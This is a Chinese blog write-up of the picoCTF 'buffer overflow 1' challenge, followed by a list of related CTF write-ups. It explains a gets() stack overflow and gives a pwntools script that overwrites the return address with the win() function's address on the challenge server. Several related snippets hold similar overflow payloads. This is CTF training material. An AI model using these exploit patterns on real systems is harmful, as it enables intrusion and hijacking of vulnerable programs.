picoctf Pwn buffer overflow 1

最新推荐文章于 2025-03-27 20:19:39 发布

原创最新推荐文章于 2025-03-27 20:19:39 发布 · 294 阅读

0 ·

CC 4.0 BY-SA版权

文章标签：

#ctf #pwn

Pwn 专栏收录该内容

57 篇文章

订阅专栏

本文详细介绍了PicoCTF中一个名为Pwnbufferoverflow11的挑战，主要涉及缓冲区溢出漏洞的利用。通过IDA反编译，发现vuln函数中使用了gets()函数，存在溢出风险。由于缺少canary和PIE保护，可以相对简单地构造payload覆盖返回地址为win()函数的地址。最终，通过发送精心构造的payload实现了远程控制目标系统的交互。

picoctf Pwn buffer overflow 1

1.IDA反编译看一下
2.checksec检查
3.检查后门函数
4.看一下vuln函数
5.利用思路
6.exp

1.IDA反编译看一下

在这里插入图片描述

2.checksec检查

在这里插入图片描述

3.检查后门函数

在这里插入图片描述

4.看一下vuln函数

在这里插入图片描述

5.利用思路

在vuln函数中有一个gets()函数可以溢出
将放回地址覆盖成win()函数的地址即可
没有canary和pie的保护利用起来非常简单

6.exp

from pwn import *
p = remote("saturn.picoctf.net",57847)
payload = 'a' * (0x28 + 4) + p32(0x080491F6)
p.sendline(payload)
p.interactive()

在这里插入图片描述

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

==Microsoft==

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
打赏
打赏
打赏举报

举报

专栏目录

PicoCTF_2018_buffer_overflow_1

m0sway的博客

11-28

538

PicoCTF_2018_buffer_overflow_1 使用checksec查看：保护机制全关，看起来没啥难度。扔进IDA中查看：主函数中给出了漏洞函数，跟进查看： gets()函数，栈溢出，s距离ebp0x28 查看下这题的字符串可以发现函数win()：能够直接获取到flag，直接秒了这题。 exp： from pwn import * #start # r = process("../buu/PicoCTF_2018_buffer_overflow_1") r = remote

BUUCTF pwn——PicoCTF_2018_buffer_overflow 1

CNS-Enterprise BCC-1701-J

05-13

179

BUUCTF 做题练习

参与评论您还未登录，请先登录后发表或查看评论

BUUCTF：PicoCTF_2018_buffer_overflow_1

weixin_51055545的博客

01-05

1464

先放进虚拟机中检查：任何保护机制都没开，放到32位IDA中：主函数很简单，进入vuln()函数看一下: 很明显有溢出，进入栈中看偏移：这里偏移为0x28，我们思路是第一次溢出，去泄露libc地址，再次进行溢出get shell。第一次溢出： io.recvuntil(':') payload = 'A'*0X28 payload += p32(0) payload += p32(printf) payload += p32(main) payload += p32(elf.got.

[BUUCTF]PWN——picoctf_2018_buffer overflow 1

BangSen1的博客

03-20

477

picoctf_2018_buffer overflow 1 例行检查，32位，没开启保护运行一下用IDA打开，检索字符串，看到了flag.txt，跟进找到了调用flag.txt的函数 win_addr=0x80485CB gets函数读入，存在溢出漏洞，覆盖ret为win函数即可 from pwn import* r=remote('node3.buuoj.cn',26185) win_addr=0x80485CB payload='a'*(0x28+4)+p32(win_addr)

[BUUCTF-pwn]——picoctf_2018_buffer overflow 1

Y_peak的博客

03-16

435

[BUUCTF-pwn]——picoctf_2018_buffer overflow 1 简单的栈溢出，返回地址，设置为win就好 exploit from pwn import * p = remote("node3.buuoj.cn",25059) payload = 'a' * (0x28 + 4) + p32(0x080485CB) p.sendline(payload) p.interactive()

[BUUCTF-pwn]——picoctf_2018_buffer overflow 0

Y_peak的博客

04-28

544

[BUUCTF-pwn]——picoctf_2018_buffer overflow 0 好久不写BUU了，手都快生了赶快过来写写。通过观察源文件发现，首先有put函数不需要去libc中找，同时argv肯定大于1，也就是需要至少两个参数，才可以到else语句，同时vuln函数的参数是第二个参数。进入vuln函数内部看看，找到strcpy函数这个函数是一个典型的可以用来利用溢出的函数。所以我们可以在这里进行栈溢出，以此调用puts函数打印flag.因为flag在bss段上。 from pwn imp

2021 Picoctf pwn部分wp

weixin_46521144的博客

07-18

703

首先说一下，是参考了校内学长的复盘讲解hhh，这也是第一次直接接触在线的ctf而不是靶场。 Gauntlet1 在ida里面看一下。这三道Gauntlet都是一个类型的，漏洞都是一个格式化字符串+栈溢出。那就很容易直接把shellcraft.sh()写道栈上，因为一开始给打印了背写区域的起始位置并且使可执行的栈，一溢出就会跳转到我们写的shellcraft上面执行。注意中间还要有个格式化字符串的额send,不要忘了，之前卡在这里好久啊。。。 exp from pwn import * context.

picoCTF 2023 Writeup By AheadSec

末初 · mochu7

03-24

3414

picoCTF 2023 Writeup By AheadSec

N1 CTF 2025 web 复现

最新发布

2301_79035389的博客

03-27

1432

在Linux里安装依赖遇到报错时，其实根本没必要到此ai或者搜，大多数时候它会给你解决方案，沉下心看看翻译跟着步骤走就解决了，包括脚本一定要在Linux环境里运行，window会报错，我用的是wsl，在window下开powshell后输wsl就可以了。看到这里调用了两次innerHTML进行html渲染，这里学到了一个新东西，html实体编码，即html的一些标签用其他的一些特定符号替换，那么浏览器在识别到这样的编码时，就不会将其当作html代码而渲染，将其还原为原本的惠html编码，举个例子。

【picoCTF]cookies write up

GZWZ_的博客

03-25

2468

burpsuit拦截的情况有几种，本来我可以写两种，第一种做完忘记了，又试了好几次，得到这种方法，家人们，加油！如果有别的解法，评论区分享一下哦。

picoctf general skills-easy 部分题目详解(1)

fenfenfen520a的博客

03-23

378

实验介绍： ctf竞赛（Capture The Flag）是网络安全技术人员代替真实攻击，比拼技术的竞赛。又名夺旗赛，是以拿到flag为目标的比赛。 picoctf上的题目比较适合新手练习。但是注册picoctf账号需要安装插件才能有人机验证，才能正常注册。插件的设置如图：一： 1. Let

2024 RSTCONCTF re 部分wp

wmr66的博客

09-16

494

Unknown Architect；Duke of the Kingdom；Keypad；Pico-Cypher

picoCTF - RE - crackme writeup

yyyayo的博客

07-09

300

代码给出了一个 ROT47 的例子。ROT47 其实就是 rotate by 47 places，是 ROT13 的一个变种。古老的加密方式了……一种 Caesar cipher，即一种 substitution cipher。解题： bezos_cc_secret = "A:4@r%uL`M-^M0c0AbcM-MFE02fh3e4a5N" # Reference alphabet alphabet = "!\"#$%&'()*+,-./0123456789:;<=>?@ABCDE

picoCTF，Binary Exploitation，二进制类，23/37

Allezima阿力代码

02-10

1730

记录一下自己做的CTF，最初将所有题目放在一个帖子里，帖子太长了，为了方便后期编辑和阅读。2023年02月10日，将帖子拆分……

CTFSHOW2023愚人杯wp

wikey 的博客

03-29

2916

题目打开是这样，很像buu上面的一道webdog，一眼base64.解密一下（face.png)看看能不能读到源码，首先就是index.php加密(aW5kZXgucGhw)那就看看源码似乎又是base64,解码果然是这样。

gets 函数漏洞执行代码

草草君

11-20

814

gets 函数漏洞执行代码最近学习了 AFL 工具，同时根据进行了gets函数的漏洞执行代码，具体的原理分析准备以后有时间进行详细分析，目前只是做一个记录，主要内容参考自这里. 环境：kali 4.13.0-kali1-amd64 1. 安装工具peda : 在命令行执行 git clone https://github.com/longld/peda.git ~/peda ech...

Pwn笔记

caterpillarous的博客

04-18

2814

Pwn笔记 -前言以下内容摘自Wiki: Pwn是一个骇客语法的俚语词，自”own”这个字引申出来的，这个词的含意在于，玩家在整个游戏对战中处在胜利的优势，或是说明竞争对手处在完全惨败的情形下，这个词习惯上在网络游戏文化主要用于嘲笑竞争对手在整个游戏对战中已经完全被击败（例如：”You just got pwned!”）。在骇客行话里，尤其在另外一种电脑技术方面，包括电脑（服务器或...

pwn入门之二：缓冲溢出

jhycjhyc的专栏

10-23

1011

pwn入门二：缓冲溢出环境：cenos6.5 64位，安装了 gcc的32位编译库，cenos运行于文本模式，搭建方法见博文《pwn入门之一：搭建64位centos6.5虚拟机》。一、建立 test1.c，内容如下： #include <stdio.h> main() { char a='a'; char b[10]; gets(b)...

[BUUCTF]PWN——picoctf_2018_buffer overflow 1/2

mcmuyanga的博客

11-07

556

picoctf_2018_buffer overflow 1 附件步骤：例行检查，32位程序，没开保护本地运行一下程序，看看程序大概的执行情况 32位ida载入，习惯性的检查程序里的字符串，发现有flag.txt，跟进，找到了读出flag的函数，win_addr=0x80485CB 根据运行时看到的字符串找到了输入点 gets函数读入，存在溢出漏洞，覆盖ret为win函数即可 from pwn import * r=remote('node3.buuoj.cn',27200) win_a

攻防世界pwn题目int_overflow

03-08

### 关于CTF PWN Int Overflow Challenge Solution 在处理PWN类型的整数溢出挑战时，理解程序如何处理输入以及这些输入怎样影响内存至关重要。当遇到名为`int_overflow`的题目时，这可能意味着某个`int`型变量存在栈溢出风险[^2]。对于这类问题的一个常见解决方法涉及以下几个方面： #### 分析目标程序使用反汇编工具IDA可以深入分析二进制文件的工作原理。通过将题目中的可执行文件加载至IDA中并检查其主要逻辑流程，能够识别潜在的安全缺陷位置。特别是要注意那些未启用安全防护机制（如stack canary）的情况，在Ubuntu环境下测试可以帮助确认这一点。 #### 构造有效载荷(Payload) 基于发现的漏洞特性来构建特定的有效载荷是非常重要的一步。例如，在某些情况下，可以通过向缓冲区填充足够的数据直到覆盖返回地址，并指向一个已知地址处的gadget链或直接调用系统函数实现控制流劫持的目的。Python库`pwntools`提供了便捷的方法用于创建这样的payloads，并且支持本地调试和远程连接服务器提交攻击尝试[^3]。 ```python from pwn import * # 设置目标IP和端口 target_ip = "example.com" port_num = 12345 # 创建远程连接对象 io = remote(target_ip, port_num) # 定义payload结构 offset_to_ret_addr = ... # 需要根据实际情况调整偏移量大小 rop_chain_or_function_ptr = ... payload = b'A' * offset_to_ret_addr + pack(rop_chain_or_function_ptr) # 发送payload给服务端 io.sendlineafter(b"prompt:", payload) ``` 请注意上述代码片段仅为模板示意；实际操作前需依据具体情况进行适当修改以适应不同场景下的需求。 #### 测试与验证完成以上准备工作之后，应当在一个受控环境中反复试验所设计出来的exploit直至成功获取shell或其他预期效果为止。同时也要注意遵守比赛规则和服务条款，确保行为合法合规[^4]。